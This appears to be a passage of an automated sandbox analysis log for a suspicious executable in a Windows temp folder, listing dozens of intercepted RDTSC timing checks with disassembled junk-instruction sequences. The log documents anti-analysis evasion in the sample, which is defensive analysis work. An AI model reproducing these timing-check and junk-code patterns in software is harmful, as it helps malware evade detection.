Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C02F1A second address: C02F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C02F20 second address: C02F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C04942 second address: C0494D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C0494D second address: C04972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1144C8B186h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F1144C8B18Bh 0x00000011 popad 0x00000012 jmp 00007F1144C8B18Dh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C044AA second address: C044AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C044AE second address: C044B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C064FE second address: C06508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C06508 second address: C06538 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1144C8B186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1144C8B18Ch 0x0000000f jnp 00007F1144C8B188h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1144C8B18Ch 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320830 second address: 5320835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320835 second address: 5320861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1144C8B195h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1144C8B18Dh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0DE7 second address: 52E0DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0DED second address: 52E0DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0DF1 second address: 52E0DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0DF5 second address: 52E0EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F1144C8B198h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F1144C8B18Eh 0x00000018 add al, FFFFFFF8h 0x0000001b jmp 00007F1144C8B18Bh 0x00000020 popfd 0x00000021 mov edi, ecx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 call 00007F1144C8B190h 0x0000002c pushfd 0x0000002d jmp 00007F1144C8B192h 0x00000032 add si, 9C88h 0x00000037 jmp 00007F1144C8B18Bh 0x0000003c popfd 0x0000003d pop eax 0x0000003e pushfd 0x0000003f jmp 00007F1144C8B199h 0x00000044 jmp 00007F1144C8B18Bh 0x00000049 popfd 0x0000004a popad 0x0000004b pop ebp 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f call 00007F1144C8B18Bh 0x00000054 pop eax 0x00000055 mov dx, 9B5Ch 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330967 second address: 5330983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330983 second address: 5330989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330989 second address: 53309AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F114478E73Dh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53309AC second address: 5330A2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1144C8B18Ch 0x00000012 xor cl, FFFFFFC8h 0x00000015 jmp 00007F1144C8B18Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F1144C8B198h 0x00000021 add ch, 00000028h 0x00000024 jmp 00007F1144C8B18Bh 0x00000029 popfd 0x0000002a popad 0x0000002b pop ebp 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F1144C8B192h 0x00000035 sub ah, FFFFFF88h 0x00000038 jmp 00007F1144C8B18Bh 0x0000003d popfd 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0A78 second address: 52A0A90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0A90 second address: 52A0AF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1144C8B196h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov edi, 63307404h 0x00000016 mov dl, CCh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F1144C8B194h 0x0000001f mov ebp, esp 0x00000021 jmp 00007F1144C8B190h 0x00000026 push dword ptr [ebp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F1144C8B18Ah 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0AF8 second address: 52A0AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0AFC second address: 52A0B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0B02 second address: 52A0B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F114478E747h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0B30 second address: 52A0B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1144C8B194h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0B48 second address: 52A0B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0B7A second address: 52A0B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0B95 second address: 52A0BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F114478E748h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52A0BCF second address: 52A0BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0B3B second address: 52E0B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0B41 second address: 52E0BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1144C8B191h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov eax, 6662B413h 0x00000017 pushfd 0x00000018 jmp 00007F1144C8B198h 0x0000001d adc ax, 0298h 0x00000022 jmp 00007F1144C8B18Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F1144C8B190h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0BA5 second address: 52E0BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0BA9 second address: 52E0BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0BAF second address: 52E0BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0BB5 second address: 52E0BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0A31 second address: 52D0A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0A37 second address: 52D0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0A3B second address: 52D0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0A3F second address: 52D0A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1144C8B196h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0A62 second address: 52D0A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0A66 second address: 52D0A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D0A6C second address: 52D0A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F114478E740h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 mov edi, 7D00227Eh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53300B3 second address: 5330106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 64A183F4h 0x00000008 push ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e jmp 00007F1144C8B194h 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007F1144C8B190h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ax, EA6Dh 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1144C8B191h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330106 second address: 533010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 533010C second address: 5330113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 533004F second address: 5330055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330055 second address: 5330059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330059 second address: 533005D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320E40 second address: 5320E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320E45 second address: 5320E72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F114478E73Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320E72 second address: 5320E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push esi 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320E87 second address: 5320E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320E8D second address: 5320EC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1144C8B195h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320EC1 second address: 5320EDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320EDE second address: 5320EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320EE3 second address: 5320EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F114478E741h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320EF8 second address: 5320EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0C3C second address: 52E0C7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F114478E73Bh 0x00000013 adc eax, 3F4CAD8Eh 0x00000019 jmp 00007F114478E749h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0C7D second address: 52E0C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0C82 second address: 52E0CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0CA5 second address: 52E0CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330473 second address: 5330479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330479 second address: 533047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 533047D second address: 53304D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F114478E742h 0x00000014 jmp 00007F114478E745h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F114478E740h 0x00000020 xor eax, 1D9EE438h 0x00000026 jmp 00007F114478E73Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53304D8 second address: 5330517 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F1144C8B18Ah 0x00000014 or esi, 48551DC8h 0x0000001a jmp 00007F1144C8B18Bh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330517 second address: 5330570 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, 585Bh 0x0000000a popad 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f jmp 00007F114478E73Ch 0x00000014 jmp 00007F114478E742h 0x00000019 popad 0x0000001a and dword ptr [eax], 00000000h 0x0000001d jmp 00007F114478E740h 0x00000022 and dword ptr [eax+04h], 00000000h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 call 00007F114478E73Dh 0x0000002e pop esi 0x0000002f push edi 0x00000030 pop esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5330570 second address: 5330577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D09CD second address: 52D09D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D09D3 second address: 52D09D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D09D9 second address: 52D09DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52D09DD second address: 52D09E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53208CE second address: 53208D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53208D2 second address: 53208D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53208D8 second address: 53208FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, DFE0h 0x00000011 mov ebx, 449C1A0Ch 0x00000016 popad 0x00000017 rdtsc
